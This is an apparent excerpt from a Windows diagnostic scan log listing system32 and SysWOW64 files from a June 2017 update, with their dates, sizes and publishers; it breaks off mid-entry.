2017-06-14 20:30 - 2017-06-03 12:01 - 05477096 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-06-14 20:30 - 2017-06-03 12:00 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-06-14 20:30 - 2017-06-03 12:00 - 00321376 _____ (Microsoft Corporation) C:\WINDOWS\system32\capauthz.dll
2017-06-14 20:30 - 2017-06-03 12:00 - 00219040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2017-06-14 20:30 - 2017-06-03 11:59 - 01409048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-06-14 20:30 - 2017-06-03 11:59 - 00626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-06-14 20:30 - 2017-06-03 11:59 - 00311200 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-06-14 20:30 - 2017-06-03 11:59 - 00259400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2017-06-14 20:30 - 2017-06-03 11:58 - 21352696 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-06-14 20:30 - 2017-06-03 11:58 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-06-14 20:30 - 2017-06-03 11:58 - 00660384 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2017-06-14 20:30 - 2017-06-03 11:58 - 00254176 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-06-14 20:30 - 2017-06-03 11:57 - 00371616 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 02228120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystems64.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 01693600 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVIntegration.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 01458592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00848288 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVOrchestration.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00846752 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVClient.exe
2017-06-14 20:30 - 2017-06-03 11:56 - 00844696 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntStreamingManager.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00697760 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVCatalog.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00672672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPublishing.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00399264 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVScripting.dll
2017-06-14 20:30 - 2017-06-03 11:55 - 02681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-06-14 20:30 - 2017-06-03 11:36 - 01150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-06-14 20:30 - 2017-06-03 11:35 - 02259768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-06-14 20:30 - 2017-06-03 11:28 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-06-14 20:30 - 2017-06-03 11:26 - 00266640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\capauthz.dll
2017-06-14 20:30 - 2017-06-03 11:23 - 20373920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-06-14 20:30 - 2017-06-03 11:23 - 06760024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-06-14 20:30 - 2017-06-03 11:23 - 00573856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2017-06-14 20:30 - 2017-06-03 11:21 - 01516448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppVEntSubsystems32.dll
2017-06-14 20:30 - 2017-06-03 11:20 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 03673088 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-06-14 20:30 - 2017-06-03 11:14 - 00443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-06-14 20:30 - 2017-06-03 11:12 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 02958848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-06-14 20:30 - 2017-06-03 11:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-06-14 20:30 - 2017-06-03 11:11 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2017-06-14 20:30 - 2017-06-03 11:10 - 00293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-06-14 20:30 - 2017-06-03 11:10 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-06-14 20:30 - 2017-06-03 11:10 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCredentialDeployment.exe
2017-06-14 20:30 - 2017-06-03 11:09 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2017-06-14 20:30 - 2017-06-03 11:09 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\devicengccredprov.dll
2017-06-14 20:30 - 2017-06-03 11:09 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-06-14 20:30 - 2017-06-03 11:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-06-14 20:30 - 2017-06-03 11:07 - 23682048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-06-14 20:30 - 2017-06-03 11:07 - 00778240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2017-06-14 20:30 - 2017-06-03 11:07 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-06-14 20:30 - 2017-06-03 11:07 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe
2017-06-14 20:30 - 2017-06-03 11:07 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2017-06-14 20:30 - 2017-06-03 11:06 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 20506624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 07336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devicengccredprov.dll
2017-06-14 20:30 - 2017-06-03 11:04 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-06-14 20:30 - 2017-06-03 11:04 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-06-14 20:30 - 2017-06-03 11:04 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-06-14 20:30 - 2017-06-03 11:03 - 19336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-06-14 20:30 - 2017-06-03 11:03 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-06-14 20:30 - 2017-06-03 11:03 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2017-06-14 20:30 - 2017-06-03 11:02 - 08245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-06-14 20:30 - 2017-06-03 11:01 - 06726656 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2017-06-14 20:30 - 2017-06-03 11:01 - 02804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-06-14 20:30 - 2017-06-03 11:00 - 03379200 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-06-14 20:30 - 2017-06-03 11:00 - 00933376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2017-06-14 20:30 - 2017-06-03 11:00 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02672128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02625024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-06-14 20:30 - 2017-06-03 10:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 01142784 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 00975360 _____ (Microsoft Corporation) C:\WINDOWS\HelpPane.exe
2017-06-14 20:30 - 2017-06-03 10:59 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 05961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 02650112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 02516480 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 01888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 00827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 11870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 06535168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2017-06-14 20:30 - 2017-06-03 10:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 02829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 01675264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 00797184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2017-06-14 20:30 - 2017-06-03 10:56 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-06-14 20:30 - 2017-06-03 10:55 - 03656192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-06-14 20:30 - 2017-06-03 10:55 - 02132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-06-14 20:30 - 2017-06-03 10:55 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-06-14 20:30 - 2017-06-03 10:54 - 02341376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2017-06-14 20:30 - 2017-06-03 10:54 - 02298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-06-14 20:30 - 2017-06-03 10:54 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwcreator.exe
2017-06-14 20:30 - 2017-06-03 10:53 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-06-14 20:30 - 2017-06-03 10:51 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\bfsvc.exe
2017-06-12 21:56 - 2017-06-14 20:22 - 00003292 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-06-12 21:55 - 2017-06-12 21:55 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-06-12 21:54 - 2017-06-12 21:54 - 00000020 ___SH C:\Users\ararat\ntuser.ini
2017-06-08 09:54 - 2017-07-03 01:27 - 00000000 ____D C:\Windows.old
2017-06-08 09:54 - 2017-06-08 09:54 - 17365504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 13840384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 08331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 07325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 06551856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05821496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05802968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04847928 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 04709528 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04672848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04537344 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03135488 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02730496 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 02679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02604256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02438656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02424016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02347520 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02088960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-06-08 09:54 - 2017-06-08 09:54 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-06-08 09:54 - 2017-06-08 09:54 - 01984000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01911752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01706496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01700408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01536512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01506712 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01474800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01459728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01455592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01450496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01333136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01302528 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\MSVPXENC.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01275904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01266544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01219560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01141760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01120864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01102848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01078272 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01067008 _____ (Microsoft Corporation) C:\WINDOWS\system32\XboxNetApiSvc.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01055648 _____ (Microsoft 
